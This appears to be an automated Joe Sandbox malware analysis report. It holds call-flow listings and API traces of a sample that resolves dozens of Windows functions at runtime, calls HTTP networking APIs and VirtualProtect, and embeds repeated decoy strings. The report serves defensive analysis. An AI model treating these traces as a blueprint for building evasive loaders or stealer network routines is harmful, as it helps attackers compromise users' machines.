38331->38332 38333 193497 38332->38333 38334 194610 2 API calls 38333->38334 38335 1934b0 38334->38335 38336 194610 2 API calls 38335->38336 38337 1934c9 38336->38337 38338 194610 2 API calls 38337->38338 38339 1934e2 38338->38339 38340 194610 2 API calls 38339->38340 38341 1934fb 38340->38341 38342 194610 2 API calls 38341->38342 38343 193514 38342->38343 38344 194610 2 API calls 38343->38344 38345 19352d 38344->38345 38346 194610 2 API calls 38345->38346 38347 193546 38346->38347 38348 194610 2 API calls 38347->38348 38349 19355f 38348->38349 38350 194610 2 API calls 38349->38350 38351 193578 38350->38351 38352 194610 2 API calls 38351->38352 38353 193591 38352->38353 38354 194610 2 API calls 38353->38354 38355 1935aa 38354->38355 38356 194610 2 API calls 38355->38356 38357 1935c3 38356->38357 38358 194610 2 API calls 38357->38358 38359 1935dc 38358->38359 38360 194610 2 API calls 38359->38360 38361 1935f5 38360->38361 38362 194610 2 API calls 38361->38362 38363 19360e 38362->38363 38364 194610 2 API calls 38363->38364 38365 193627 38364->38365 38366 194610 2 API calls 38365->38366 38367 193640 38366->38367 38368 194610 2 API calls 38367->38368 38369 193659 38368->38369 38370 194610 2 API calls 38369->38370 38371 193672 38370->38371 38372 194610 2 API calls 38371->38372 38373 19368b 38372->38373 38374 194610 2 API calls 38373->38374 38375 1936a4 38374->38375 38376 194610 2 API calls 38375->38376 38377 1936bd 38376->38377 38378 194610 2 API calls 38377->38378 38379 1936d6 38378->38379 38380 194610 2 API calls 38379->38380 38381 1936ef 38380->38381 38382 194610 2 API calls 38381->38382 38383 193708 38382->38383 38384 194610 2 API calls 38383->38384 38385 193721 38384->38385 38386 194610 2 API calls 38385->38386 38387 19373a 38386->38387 38388 194610 2 API calls 38387->38388 38389 193753 38388->38389 38390 194610 2 API calls 38389->38390 38391 19376c 38390->38391 38392 194610 2 API calls 38391->38392 38393 193785 38392->38393 38394 194610 2 API calls 38393->38394 
38395 19379e 38394->38395 38396 194610 2 API calls 38395->38396 38397 1937b7 38396->38397 38398 194610 2 API calls 38397->38398 38399 1937d0 38398->38399 38400 194610 2 API calls 38399->38400 38401 1937e9 38400->38401 38402 194610 2 API calls 38401->38402 38403 193802 38402->38403 38404 194610 2 API calls 38403->38404 38405 19381b 38404->38405 38406 194610 2 API calls 38405->38406 38407 193834 38406->38407 38408 194610 2 API calls 38407->38408 38409 19384d 38408->38409 38410 194610 2 API calls 38409->38410 38411 193866 38410->38411 38412 194610 2 API calls 38411->38412 38413 19387f 38412->38413 38414 194610 2 API calls 38413->38414 38415 193898 38414->38415 38416 194610 2 API calls 38415->38416 38417 1938b1 38416->38417 38418 194610 2 API calls 38417->38418 38419 1938ca 38418->38419 38420 194610 2 API calls 38419->38420 38421 1938e3 38420->38421 38422 194610 2 API calls 38421->38422 38423 1938fc 38422->38423 38424 194610 2 API calls 38423->38424 38425 193915 38424->38425 38426 194610 2 API calls 38425->38426 38427 19392e 38426->38427 38428 194610 2 API calls 38427->38428 38429 193947 38428->38429 38430 194610 2 API calls 38429->38430 38431 193960 38430->38431 38432 194610 2 API calls 38431->38432 38433 193979 38432->38433 38434 194610 2 API calls 38433->38434 38435 193992 38434->38435 38436 194610 2 API calls 38435->38436 38437 1939ab 38436->38437 38438 194610 2 API calls 38437->38438 38439 1939c4 38438->38439 38440 194610 2 API calls 38439->38440 38441 1939dd 38440->38441 38442 194610 2 API calls 38441->38442 38443 1939f6 38442->38443 38444 194610 2 API calls 38443->38444 38445 193a0f 38444->38445 38446 194610 2 API calls 38445->38446 38447 193a28 38446->38447 38448 194610 2 API calls 38447->38448 38449 193a41 38448->38449 38450 194610 2 API calls 38449->38450 38451 193a5a 38450->38451 38452 194610 2 API calls 38451->38452 38453 193a73 38452->38453 38454 194610 2 API calls 38453->38454 38455 193a8c 38454->38455 38456 194610 2 API calls 38455->38456 38457 193aa5 
38456->38457 38458 194610 2 API calls 38457->38458 38459 193abe 38458->38459 38460 194610 2 API calls 38459->38460 38461 193ad7 38460->38461 38462 194610 2 API calls 38461->38462 38463 193af0 38462->38463 38464 194610 2 API calls 38463->38464 38465 193b09 38464->38465 38466 194610 2 API calls 38465->38466 38467 193b22 38466->38467 38468 194610 2 API calls 38467->38468 38469 193b3b 38468->38469 38470 194610 2 API calls 38469->38470 38471 193b54 38470->38471 38472 194610 2 API calls 38471->38472 38473 193b6d 38472->38473 38474 194610 2 API calls 38473->38474 38475 193b86 38474->38475 38476 194610 2 API calls 38475->38476 38477 193b9f 38476->38477 38478 194610 2 API calls 38477->38478 38479 193bb8 38478->38479 38480 194610 2 API calls 38479->38480 38481 193bd1 38480->38481 38482 194610 2 API calls 38481->38482 38483 193bea 38482->38483 38484 194610 2 API calls 38483->38484 38485 193c03 38484->38485 38486 194610 2 API calls 38485->38486 38487 193c1c 38486->38487 38488 194610 2 API calls 38487->38488 38489 193c35 38488->38489 38490 194610 2 API calls 38489->38490 38491 193c4e 38490->38491 38492 194610 2 API calls 38491->38492 38493 193c67 38492->38493 38494 194610 2 API calls 38493->38494 38495 193c80 38494->38495 38496 194610 2 API calls 38495->38496 38497 193c99 38496->38497 38498 194610 2 API calls 38497->38498 38499 193cb2 38498->38499 38500 194610 2 API calls 38499->38500 38501 193ccb 38500->38501 38502 194610 2 API calls 38501->38502 38503 193ce4 38502->38503 38504 194610 2 API calls 38503->38504 38505 193cfd 38504->38505 38506 194610 2 API calls 38505->38506 38507 193d16 38506->38507 38508 194610 2 API calls 38507->38508 38509 193d2f 38508->38509 38510 194610 2 API calls 38509->38510 38511 193d48 38510->38511 38512 194610 2 API calls 38511->38512 38513 193d61 38512->38513 38514 194610 2 API calls 38513->38514 38515 193d7a 38514->38515 38516 194610 2 API calls 38515->38516 38517 193d93 38516->38517 38518 194610 2 API calls 38517->38518 38519 193dac 38518->38519 
38520 194610 2 API calls 38519->38520 38521 193dc5 38520->38521 38522 194610 2 API calls 38521->38522 38523 193dde 38522->38523 38524 194610 2 API calls 38523->38524 38525 193df7 38524->38525 38526 194610 2 API calls 38525->38526 38527 193e10 38526->38527 38528 194610 2 API calls 38527->38528 38529 193e29 38528->38529 38530 194610 2 API calls 38529->38530 38531 193e42 38530->38531 38532 194610 2 API calls 38531->38532 38533 193e5b 38532->38533 38534 194610 2 API calls 38533->38534 38535 193e74 38534->38535 38536 194610 2 API calls 38535->38536 38537 193e8d 38536->38537 38538 194610 2 API calls 38537->38538 38539 193ea6 38538->38539 38540 194610 2 API calls 38539->38540 38541 193ebf 38540->38541 38542 194610 2 API calls 38541->38542 38543 193ed8 38542->38543 38544 194610 2 API calls 38543->38544 38545 193ef1 38544->38545 38546 194610 2 API calls 38545->38546 38547 193f0a 38546->38547 38548 194610 2 API calls 38547->38548 38549 193f23 38548->38549 38550 194610 2 API calls 38549->38550 38551 193f3c 38550->38551 38552 194610 2 API calls 38551->38552 38553 193f55 38552->38553 38554 194610 2 API calls 38553->38554 38555 193f6e 38554->38555 38556 194610 2 API calls 38555->38556 38557 193f87 38556->38557 38558 194610 2 API calls 38557->38558 38559 193fa0 38558->38559 38560 194610 2 API calls 38559->38560 38561 193fb9 38560->38561 38562 194610 2 API calls 38561->38562 38563 193fd2 38562->38563 38564 194610 2 API calls 38563->38564 38565 193feb 38564->38565 38566 194610 2 API calls 38565->38566 38567 194004 38566->38567 38568 194610 2 API calls 38567->38568 38569 19401d 38568->38569 38570 194610 2 API calls 38569->38570 38571 194036 38570->38571 38572 194610 2 API calls 38571->38572 38573 19404f 38572->38573 38574 194610 2 API calls 38573->38574 38575 194068 38574->38575 38576 194610 2 API calls 38575->38576 38577 194081 38576->38577 38578 194610 2 API calls 38577->38578 38579 19409a 38578->38579 38580 194610 2 API calls 38579->38580 38581 1940b3 38580->38581 38582 194610 2 
API calls 38581->38582 38583 1940cc 38582->38583 38584 194610 2 API calls 38583->38584 38585 1940e5 38584->38585 38586 194610 2 API calls 38585->38586 38587 1940fe 38586->38587 38588 194610 2 API calls 38587->38588 38589 194117 38588->38589 38590 194610 2 API calls 38589->38590 38591 194130 38590->38591 38592 194610 2 API calls 38591->38592 38593 194149 38592->38593 38594 194610 2 API calls 38593->38594 38595 194162 38594->38595 38596 194610 2 API calls 38595->38596 38597 19417b 38596->38597 38598 194610 2 API calls 38597->38598 38599 194194 38598->38599 38600 194610 2 API calls 38599->38600 38601 1941ad 38600->38601 38602 194610 2 API calls 38601->38602 38603 1941c6 38602->38603 38604 194610 2 API calls 38603->38604 38605 1941df 38604->38605 38606 194610 2 API calls 38605->38606 38607 1941f8 38606->38607 38608 194610 2 API calls 38607->38608 38609 194211 38608->38609 38610 194610 2 API calls 38609->38610 38611 19422a 38610->38611 38612 194610 2 API calls 38611->38612 38613 194243 38612->38613 38614 194610 2 API calls 38613->38614 38615 19425c 38614->38615 38616 194610 2 API calls 38615->38616 38617 194275 38616->38617 38618 194610 2 API calls 38617->38618 38619 19428e 38618->38619 38620 194610 2 API calls 38619->38620 38621 1942a7 38620->38621 38622 194610 2 API calls 38621->38622 38623 1942c0 38622->38623 38624 194610 2 API calls 38623->38624 38625 1942d9 38624->38625 38626 194610 2 API calls 38625->38626 38627 1942f2 38626->38627 38628 194610 2 API calls 38627->38628 38629 19430b 38628->38629 38630 194610 2 API calls 38629->38630 38631 194324 38630->38631 38632 194610 2 API calls 38631->38632 38633 19433d 38632->38633 38634 194610 2 API calls 38633->38634 38635 194356 38634->38635 38636 194610 2 API calls 38635->38636 38637 19436f 38636->38637 38638 194610 2 API calls 38637->38638 38639 194388 38638->38639 38640 194610 2 API calls 38639->38640 38641 1943a1 38640->38641 38642 194610 2 API calls 38641->38642 38643 1943ba 38642->38643 38644 194610 2 API calls 
38643->38644 38645 1943d3 38644->38645 38646 194610 2 API calls 38645->38646 38647 1943ec 38646->38647 38648 194610 2 API calls 38647->38648 38649 194405 38648->38649 38650 194610 2 API calls 38649->38650 38651 19441e 38650->38651 38652 194610 2 API calls 38651->38652 38653 194437 38652->38653 38654 194610 2 API calls 38653->38654 38655 194450 38654->38655 38656 194610 2 API calls 38655->38656 38657 194469 38656->38657 38658 194610 2 API calls 38657->38658 38659 194482 38658->38659 38660 194610 2 API calls 38659->38660 38661 19449b 38660->38661 38662 194610 2 API calls 38661->38662 38663 1944b4 38662->38663 38664 194610 2 API calls 38663->38664 38665 1944cd 38664->38665 38666 194610 2 API calls 38665->38666 38667 1944e6 38666->38667 38668 194610 2 API calls 38667->38668 38669 1944ff 38668->38669 38670 194610 2 API calls 38669->38670 38671 194518 38670->38671 38672 194610 2 API calls 38671->38672 38673 194531 38672->38673 38674 194610 2 API calls 38673->38674 38675 19454a 38674->38675 38676 194610 2 API calls 38675->38676 38677 194563 38676->38677 38678 194610 2 API calls 38677->38678 38679 19457c 38678->38679 38680 194610 2 API calls 38679->38680 38681 194595 38680->38681 38682 194610 2 API calls 38681->38682 38683 1945ae 38682->38683 38684 194610 2 API calls 38683->38684 38685 1945c7 38684->38685 38686 194610 2 API calls 38685->38686 38687 1945e0 38686->38687 38688 194610 2 API calls 38687->38688 38689 1945f9 38688->38689 38690 1a9f20 38689->38690 38691 1a9f30 43 API calls 38690->38691 38692 1aa346 8 API calls 38690->38692 38691->38692 38693 1aa3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38692->38693 38694 1aa456 38692->38694 38693->38694 38695 1aa463 8 API calls 38694->38695 38696 1aa526 38694->38696 38695->38696 38697 1aa5a8 38696->38697 38698 1aa52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38696->38698 38699 1aa647 38697->38699 38700 1aa5b5 6 API calls 38697->38700 38698->38697 38701 1aa72f 
38699->38701 38702 1aa654 9 API calls 38699->38702 38700->38699 38703 1aa738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38701->38703 38704 1aa7b2 38701->38704 38702->38701 38703->38704 38705 1aa7bb GetProcAddress GetProcAddress 38704->38705 38706 1aa7ec 38704->38706 38705->38706 38707 1aa825 38706->38707 38708 1aa7f5 GetProcAddress GetProcAddress 38706->38708 38709 1aa922 38707->38709 38710 1aa832 10 API calls 38707->38710 38708->38707 38711 1aa92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38709->38711 38712 1aa98d 38709->38712 38710->38709 38711->38712 38713 1aa9ae 38712->38713 38714 1aa996 GetProcAddress 38712->38714 38715 1a5ef3 38713->38715 38716 1aa9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38713->38716 38714->38713 38717 191590 38715->38717 38716->38715 38987 1916b0 38717->38987 38720 1aaab0 lstrcpy 38721 1915b5 38720->38721 38722 1aaab0 lstrcpy 38721->38722 38723 1915c7 38722->38723 38724 1aaab0 lstrcpy 38723->38724 38725 1915d9 38724->38725 38726 1aaab0 lstrcpy 38725->38726 38727 191663 38726->38727 38728 1a5760 38727->38728 38729 1a5771 38728->38729 38730 1aab30 2 API calls 38729->38730 38731 1a577e 38730->38731 38732 1aab30 2 API calls 38731->38732 38733 1a578b 38732->38733 38734 1aab30 2 API calls 38733->38734 38735 1a5798 38734->38735 38736 1aaa50 lstrcpy 38735->38736 38737 1a57a5 38736->38737 38738 1aaa50 lstrcpy 38737->38738 38739 1a57b2 38738->38739 38740 1aaa50 lstrcpy 38739->38740 38741 1a57bf 38740->38741 38742 1aaa50 lstrcpy 38741->38742 38782 1a57cc 38742->38782 38743 1a5510 25 API calls 38743->38782 38744 1a5440 20 API calls 38744->38782 38745 1a5893 StrCmpCA 38745->38782 38746 1a58f0 StrCmpCA 38747 1a5a2c 38746->38747 38746->38782 38748 1aabb0 lstrcpy 38747->38748 38749 1a5a38 38748->38749 38750 1aab30 2 API calls 38749->38750 38753 1a5a46 38750->38753 38751 1aaa50 lstrcpy 38751->38782 38752 1aab30 lstrlen lstrcpy 38752->38782 38755 1aab30 2 API calls 38753->38755 38754 
1a5aa6 StrCmpCA 38756 1a5be1 38754->38756 38754->38782 38759 1a5a55 38755->38759 38758 1aabb0 lstrcpy 38756->38758 38757 1aabb0 lstrcpy 38757->38782 38760 1a5bed 38758->38760 38761 1916b0 lstrcpy 38759->38761 38762 1aab30 2 API calls 38760->38762 38779 1a5a61 38761->38779 38763 1a5bfb 38762->38763 38765 1aab30 2 API calls 38763->38765 38764 1a5c5b StrCmpCA 38766 1a5c78 38764->38766 38767 1a5c66 Sleep 38764->38767 38768 1a5c0a 38765->38768 38769 1aabb0 lstrcpy 38766->38769 38767->38782 38770 1916b0 lstrcpy 38768->38770 38771 1a5c84 38769->38771 38770->38779 38773 1aab30 2 API calls 38771->38773 38772 191590 lstrcpy 38772->38782 38774 1a5c93 38773->38774 38775 1aab30 2 API calls 38774->38775 38776 1a5ca2 38775->38776 38778 1916b0 lstrcpy 38776->38778 38777 1a59da StrCmpCA 38777->38782 38778->38779 38779->37835 38780 1a5b8f StrCmpCA 38780->38782 38781 1aaab0 lstrcpy 38781->38782 38782->38743 38782->38744 38782->38745 38782->38746 38782->38751 38782->38752 38782->38754 38782->38757 38782->38764 38782->38772 38782->38777 38782->38780 38782->38781 38784 1a76dc 38783->38784 38785 1a76e3 GetVolumeInformationA 38783->38785 38784->38785 38786 1a7721 38785->38786 38787 1a778c GetProcessHeap RtlAllocateHeap 38786->38787 38788 1a77b8 wsprintfA 38787->38788 38789 1a77a9 38787->38789 38791 1aaa50 lstrcpy 38788->38791 38790 1aaa50 lstrcpy 38789->38790 38792 1a5ff7 38790->38792 38791->38792 38792->37856 38794 1aaab0 lstrcpy 38793->38794 38795 1948e9 38794->38795 38996 194800 38795->38996 38797 1948f5 38798 1aaa50 lstrcpy 38797->38798 38799 194927 38798->38799 38800 1aaa50 lstrcpy 38799->38800 38801 194934 38800->38801 38802 1aaa50 lstrcpy 38801->38802 38803 194941 38802->38803 38804 1aaa50 lstrcpy 38803->38804 38805 19494e 38804->38805 38806 1aaa50 lstrcpy 38805->38806 38807 19495b InternetOpenA StrCmpCA 38806->38807 38808 194994 38807->38808 38809 194f1b InternetCloseHandle 38808->38809 39002 1a8cf0 38808->39002 38810 194f38 38809->38810 39017 19a210 CryptStringToBinaryA 
38810->39017 38812 1949b3 39010 1aac30 38812->39010 38815 1949c6 38817 1aabb0 lstrcpy 38815->38817 38822 1949cf 38817->38822 38818 1aab30 2 API calls 38819 194f55 38818->38819 38821 1aacc0 4 API calls 38819->38821 38820 194f77 codecvt 38824 1aaab0 lstrcpy 38820->38824 38823 194f6b 38821->38823 38826 1aacc0 4 API calls 38822->38826 38825 1aabb0 lstrcpy 38823->38825 38837 194fa7 38824->38837 38825->38820 38827 1949f9 38826->38827 38828 1aabb0 lstrcpy 38827->38828 38829 194a02 38828->38829 38830 1aacc0 4 API calls 38829->38830 38831 194a21 38830->38831 38832 1aabb0 lstrcpy 38831->38832 38833 194a2a 38832->38833 38834 1aac30 3 API calls 38833->38834 38835 194a48 38834->38835 38836 1aabb0 lstrcpy 38835->38836 38838 194a51 38836->38838 38837->37859 38839 1aacc0 4 API calls 38838->38839 38840 194a70 38839->38840 38841 1aabb0 lstrcpy 38840->38841 38842 194a79 38841->38842 38843 1aacc0 4 API calls 38842->38843 38844 194a98 38843->38844 38845 1aabb0 lstrcpy 38844->38845 38846 194aa1 38845->38846 38847 1aacc0 4 API calls 38846->38847 38848 194acd 38847->38848 38849 1aac30 3 API calls 38848->38849 38850 194ad4 38849->38850 38851 1aabb0 lstrcpy 38850->38851 38852 194add 38851->38852 38853 194af3 InternetConnectA 38852->38853 38853->38809 38854 194b23 HttpOpenRequestA 38853->38854 38856 194b78 38854->38856 38857 194f0e InternetCloseHandle 38854->38857 38858 1aacc0 4 API calls 38856->38858 38857->38809 38859 194b8c 38858->38859 38860 1aabb0 lstrcpy 38859->38860 38861 194b95 38860->38861 38862 1aac30 3 API calls 38861->38862 38863 194bb3 38862->38863 38864 1aabb0 lstrcpy 38863->38864 38865 194bbc 38864->38865 38866 1aacc0 4 API calls 38865->38866 38867 194bdb 38866->38867 38868 1aabb0 lstrcpy 38867->38868 38869 194be4 38868->38869 38870 1aacc0 4 API calls 38869->38870 38871 194c05 38870->38871 38872 1aabb0 lstrcpy 38871->38872 38873 194c0e 38872->38873 38874 1aacc0 4 API calls 38873->38874 38875 194c2e 38874->38875 38876 1aabb0 lstrcpy 38875->38876 38877 194c37 38876->38877 38878 

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 1a9bb0-1a9bc4 call 1a9aa0 663 1a9bca-1a9dde call 1a9ad0 GetProcAddress * 21 660->663 664 1a9de3-1a9e42 LoadLibraryA * 5 660->664 663->664 666 1a9e5d-1a9e64 664->666 667 1a9e44-1a9e58 GetProcAddress 664->667 669 1a9e96-1a9e9d 666->669 670 1a9e66-1a9e91 GetProcAddress * 2 666->670 667->666 671 1a9eb8-1a9ebf 669->671 672 1a9e9f-1a9eb3 GetProcAddress 669->672 670->669 673 1a9ed9-1a9ee0 671->673 674 1a9ec1-1a9ed4 GetProcAddress 671->674 672->671 675 1a9ee2-1a9f0c GetProcAddress * 2 673->675 676 1a9f11-1a9f12 673->676 674->673 675->676
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,00E20DD0), ref: 001A9BF1
                                    • GetProcAddress.KERNEL32(75900000,00E20F50), ref: 001A9C0A
                                    • GetProcAddress.KERNEL32(75900000,00E20E00), ref: 001A9C22
                                    • GetProcAddress.KERNEL32(75900000,00E20C68), ref: 001A9C3A
                                    • GetProcAddress.KERNEL32(75900000,00E20C98), ref: 001A9C53
                                    • GetProcAddress.KERNEL32(75900000,00E29290), ref: 001A9C6B
                                    • GetProcAddress.KERNEL32(75900000,00E14F40), ref: 001A9C83
                                    • GetProcAddress.KERNEL32(75900000,00E14F60), ref: 001A9C9C
                                    • GetProcAddress.KERNEL32(75900000,00E20CC8), ref: 001A9CB4
                                    • GetProcAddress.KERNEL32(75900000,00E20CE0), ref: 001A9CCC
                                    • GetProcAddress.KERNEL32(75900000,00E20E30), ref: 001A9CE5
                                    • GetProcAddress.KERNEL32(75900000,00E20E60), ref: 001A9CFD
                                    • GetProcAddress.KERNEL32(75900000,00E15120), ref: 001A9D15
                                    • GetProcAddress.KERNEL32(75900000,00E20E48), ref: 001A9D2E
                                    • GetProcAddress.KERNEL32(75900000,00E20E90), ref: 001A9D46
                                    • GetProcAddress.KERNEL32(75900000,00E15140), ref: 001A9D5E
                                    • GetProcAddress.KERNEL32(75900000,00E20EC0), ref: 001A9D77
                                    • GetProcAddress.KERNEL32(75900000,00E20FF8), ref: 001A9D8F
                                    • GetProcAddress.KERNEL32(75900000,00E150E0), ref: 001A9DA7
                                    • GetProcAddress.KERNEL32(75900000,00E20F80), ref: 001A9DC0
                                    • GetProcAddress.KERNEL32(75900000,00E15160), ref: 001A9DD8
                                    • LoadLibraryA.KERNEL32(00E20F98,?,001A6CA0), ref: 001A9DEA
                                    • LoadLibraryA.KERNEL32(00E20FC8,?,001A6CA0), ref: 001A9DFB
                                    • LoadLibraryA.KERNEL32(00E20FB0,?,001A6CA0), ref: 001A9E0D
                                    • LoadLibraryA.KERNEL32(00E20FE0,?,001A6CA0), ref: 001A9E1F
                                    • LoadLibraryA.KERNEL32(00E21028,?,001A6CA0), ref: 001A9E30
                                    • GetProcAddress.KERNEL32(75070000,00E21010), ref: 001A9E52
                                    • GetProcAddress.KERNEL32(75FD0000,00E20F68), ref: 001A9E73
                                    • GetProcAddress.KERNEL32(75FD0000,00E29668), ref: 001A9E8B
                                    • GetProcAddress.KERNEL32(75A50000,00E29698), ref: 001A9EAD
                                    • GetProcAddress.KERNEL32(74E50000,00E14FC0), ref: 001A9ECE
                                    • GetProcAddress.KERNEL32(76E80000,00E29120), ref: 001A9EEF
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 001A9F06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: Q$@O$@Q$NtQueryInformationProcess$`O$`Q$P
                                    • API String ID: 2238633743-3470254300
                                    • Opcode ID: ff012cd1c1cc8d122a22cb1c640e8a530f1e81931da1c917b7c410148315ce20
                                    • Instruction ID: 2b26d79ad920807f2542aff67531456fe2375de1c5d785d5c074710e0d6bf7c2
                                    • Opcode Fuzzy Hash: ff012cd1c1cc8d122a22cb1c640e8a530f1e81931da1c917b7c410148315ce20
                                    • Instruction Fuzzy Hash: 52A14FB5518201DFC344DFA8EC989967BA9A74E709710867BF909C3370FBB49940CF6A

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 194610-1946e5 RtlAllocateHeap 781 1946f0-1946f6 764->781 782 1946fc-19479a 781->782 783 19479f-1947f9 VirtualProtect 781->783 782->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0019465F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001947EC
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0019467D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194784
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0019462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001946C8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194667
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194688
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001946A7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194763
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194728
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194779
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194707
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001947AA
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194672
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194693
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001946D3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001947B5
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0019476E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0019479F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001947C0
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001946B2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0019478F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001947CB
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194712
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0019471D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001946BD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001946FC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194617
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
